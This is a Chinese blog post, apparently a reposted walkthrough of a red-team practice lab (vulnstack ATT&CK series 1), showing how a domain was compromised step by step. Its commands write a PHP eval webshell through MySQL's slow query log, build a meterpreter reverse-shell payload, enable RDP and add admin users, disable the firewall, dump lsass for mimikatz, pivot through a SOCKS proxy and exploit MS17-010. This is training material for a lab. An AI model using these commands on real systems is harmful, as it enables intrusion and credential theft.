码迷,mamicode.com
首页 > 其他好文 > 详细

ATT&CK实战系列——红队实战(一)

时间:2020-10-16 10:36:42      阅读:53      评论:0      收藏:0      [点我收藏+]

标签:导出   访问   版本   firewall   域控   pass   目录   sas   hand   

ATT&CK实战系列——红队实战(一)

靶机简介

红日靶场 ATT&CK实战系列——红队实战(一)

红队实战系列,主要以真实企业环境为实例搭建一系列靶场。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。虚拟机所有统一密码:hongrisec@2019。

靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/?page=2

环境搭建

技术图片

  1. kali 设置为NAT模式
  2. win2003win2008设置为仅主机模式
  3. win7 添加一个网卡,一个设置为NAT模式,另一个设置为仅主机模式

外网打点

phpmyadmin拿shell

netdiscover发现主机ip

访问后发现后一phpStudy探针

技术图片

目录扫描发现有phpmyadmin

发现存在弱口令root/root

技术图片

尝试写入shell select .. into outfile ..,发现有 --secure-file-priv 限制

技术图片

利用(慢日志查询)绕过

set global slow_query_log=‘on‘;
set global slow_query_file=‘C://phpstudy/WWW/shell.php‘;
select ‘<?php @eval(@_POST[dimp]);?>‘ or sleep(5);

这里写shell遇到一个问题,当我设置路径为 C:\\phpstudy\WWW时,最后写入的文件在C盘中,文件名为phpstudywwwshell.php,并没有写入web目录。

我把路径斜杠换一下换成反斜杠即写入成功

技术图片

然后即可通过蚁剑连接 (msf.exe是后来上传上去的后门)

技术图片

反弹shell

通过msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=监听ip lport= 监听端口 -f exe >msf.exe
技术图片

msf开启监听

use exploit/multi/hander
set payload windows/meterpreter/reverse_tcp
set lhost
set lport 
run 

将生成的木马上传到蚁剑执行,上线!

技术图片

提权

使用 getsystem 提权,即可提权成功

技术图片

远程连接

查看端口情况发现3389并未开启

技术图片

开启3389的命令

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f  # 开启3389命令

技术图片

之后添加用户,并将用户添加到管理员组

net user username password /add
net localgroup Administrators username /add

技术图片

然后通过3389去连目标,但是却连接失败,估计是被防火墙拦截了

技术图片

在meterpreter中关闭防火墙

技术图片

然后即可连3389了

技术图片

登陆用户的时候发现要把别人挤下来,

技术图片

(此时可以上传一个rdp的用户多开工具 RDPWrap,即可成功登陆。)

抓取密码

抓取密码的话可以直接上传 mimikatz到靶机进行抓取,但是容易被杀软识别,如果工具可免杀的话可直接上传到服务器抓取。如果不免杀的话可以先用 procdump导出 lsass.dmp 拖回本地抓取密码来规避杀软。

procdump 上传到蚁剑中,并运行一下命令导出 lsass.dmp

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

技术图片

奇怪的是 dir 打开能看到这个文件,但是用蚁剑打开却没有此文件

技术图片

不知道这是咋回事,换菜刀连接shell即可看到该文件,下载下来。

技术图片

然后在mimikatz中使用以下命令即可获取密码

sekurlsa::minidump ./dir/lsass.dmp
sekurlsa::logonpasswords

成功抓取到明文密码

技术图片

撸入内网

ms17_010 拿下win2003

查看路由表

arp -a

技术图片

可以看到另一个段 192.168.52.0/24

添加路由(忘记截图了)

run autoroute -s 192.168.52.0/24 # 添加路由
run autoroute -p # 查看路由

假设msf代理,构建内网通道(忘记截图了)

use auxiliary/server/socks4a
set srvhost 192.168.136.131
ser srvport 1080
run

然后编辑 proxychains,在最后一行设置相应ip和端口

sudo vim /etc/proxychains.conf

查看代理是否成功,curl一下网页的内网地址

技术图片

然后通过nmap扫描端口,发现开启了smb端口

技术图片

通过smb_version模块扫描系统版本

user auxiliary/scanner/smb/smb_version
set rhost 192.168.52.141
run

技术图片

得到该系统为win2003,然后检测是否存在永恒之蓝漏洞

use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.52.141
run

技术图片

确定存在漏洞,直接打shell

search 17_010

技术图片

ms17_010_eternalblue直接打,但是却拿不到shell

技术图片

但发现可以用 ms17_010_command执行命令

技术图片

那就直接开启3389,添加用户登陆(注意开启3389的命令,对其中的反斜杠和双引号要添加反斜杠转义)

set command  "REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"
run

技术图片

nmap探测开启情况

技术图片

添加用户并添加到管理员组

set command "net user username password /add"
run
set command "net localgroup Administrator username /add"
run

登陆3389

proxychains desktop 192.168.52.141

技术图片

ms17_010 拿下域控

发现域控也开了445,同样用smb_version探测系统

技术图片

同样发现直接打不了shell,但是可以 ms17_010_command 执行命令

技术图片

同样开启3389,添加用户

技术图片

但是nmap探测却发现3389端口未开启,估计又是防火墙的原因,关闭防火墙

netsh firewall set opmode mode=disable

技术图片

添加用户登陆(之前还用抓到了管理密码,可以直接用管理账号)

技术图片

拿下域控

技术图片

ATT&CK实战系列——红队实战(一)

标签:导出   访问   版本   firewall   域控   pass   目录   sas   hand   

原文地址:https://www.cnblogs.com/tlbjiayou/p/13820578.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!